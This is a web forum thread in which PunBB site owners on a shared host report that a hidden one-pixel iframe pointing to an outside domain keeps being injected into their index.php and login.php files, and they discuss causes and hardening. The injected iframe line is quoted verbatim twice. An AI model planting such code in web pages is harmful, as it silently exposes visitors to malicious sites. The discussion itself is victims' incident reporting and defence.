1

Topic: Unexpected "<" ?

Hey there,

I think something strange is going on, but I'm not sure. So I thought I'd report it here.

A couple days ago my pun index returned an error saying there was an unexpected "<" on the last line of the index.php

I went into the index file and looked.

I found:

<!-- o4 --><iframe src="http://t.fala.org.ua/" width=1 height=1 style="display:none"><!-- c4 -->

I'd never seen this before, so I removed it and the index worked just fine again.

I also reset my index page's permissions to be sure they weren't writable (they weren't, but i reset the permissions anyway.)

Today a similar issue appeared with login.php

same code:

<!-- o4 --><iframe src="http://t.fala.org.ua/" width=1 height=1 style="display:none"><!-- c4 -->

appeaded at the bottom of the login.php

What's going on?
How are people able to get into my server and add this broken code?

How can I stop it?

Re: Unexpected "<" ?

Are you on a shared host? (or your own server)

3

Re: Unexpected "<" ?

a shared host. but it's my own account, and no one else has access.

The error logs have been blowing up lately, so this looks like some kind of issue from outside.
But I wouldn't know, many of the errors are simple people trying to log in and can't because of the 'unexpected ">" message

very strange.

Re: Unexpected "<" ?

Congratulations, you got hacked.

5

Re: Unexpected "<" ?

elbekko wrote:

Congratulations, you got hacked.

yeah, awesome.

Thanks.

But the question is:
How to determine where the hack came in?

I ran the user management plugin, and removed all the users who have never posted and are unverified.
I changed my login and password att he server level
I removed the calender mod, and the link mod.
So now the only other addition to my board is the chatbox, the ajax version.

I am considering turning off guest access and new logins until I've gotten to the bottom of this, but at this point I'm not sure if it will do any good.

I suppose I could post my error logs so that people here could take a look, and possibly defend others from this type of attack, but they're huge and I don't want to do that unless it's going to be helpful.

Re: Unexpected "<" ?

You might want to contact your host and ask if there have been any security breaches recently. Shared hosts try to ensure that you and you alone have access to your files -- and usually succeed -- but on occasion they trip up.

Question: when you say that the line is appended to the bottom of the pages, do you mean the PHP source, the HTML source, or both?

Looking for a certain modification for your forum? Please take a look here before posting.

7

Re: Unexpected "<" ?

I mean the root php documents for punbb

not the templates. not the style.

the actual documents themselves.

8

Re: Unexpected "<" ?

Also, no, my host (CWI) say there have been no security breaches.
No one but me has logged into my account.

Curious.

Re: Unexpected "<" ?

Are your files chmodded such that someone else could edit them?

Re: Unexpected "<" ?

or is PHP(/webserver) allowed to edit the files?

11

Re: Unexpected "<" ?

I also have a site hosted at CWI which was modifed with the exact same code, July 23rd.

It looked like who ever hacked the site used a script which searched through the site of files with index or login in the name.  And then searched for </body> in the text and inserted the above code just above the end body.

I reported the issue to CWI and they told me that there had been a login from a server in Hong Kong.

12

Re: Unexpected "<" ?

interesting.

so this means what? I deleted all my unposting users using the user management plugin, but wouldn't you have to be logged into the server to access these files?

the code hasn't returned, but we are certainly vulnerable.

very troubling.

Re: Unexpected "<" ?

Unless you figure out how the person got in, I would assume it wasn't a PunBB issue: as alano said, it was probably done by a script looking for vulnerable files. Make sure your files aren't writable by the webserver's user.

14

Re: Unexpected "<" ?

I disabled the links page and the calendar and it seems to be ok now.

Re: Unexpected "<" ?

Well, not sure if this post is dead or not. But i thought i'd put my two cents in. Several of our pages were hacked as well with the same code. weird. We use CWI as well. Did anyone find out what this hack does, or what securities it might have breached. Thanks all!

non-techie's first post so please be kind.

peace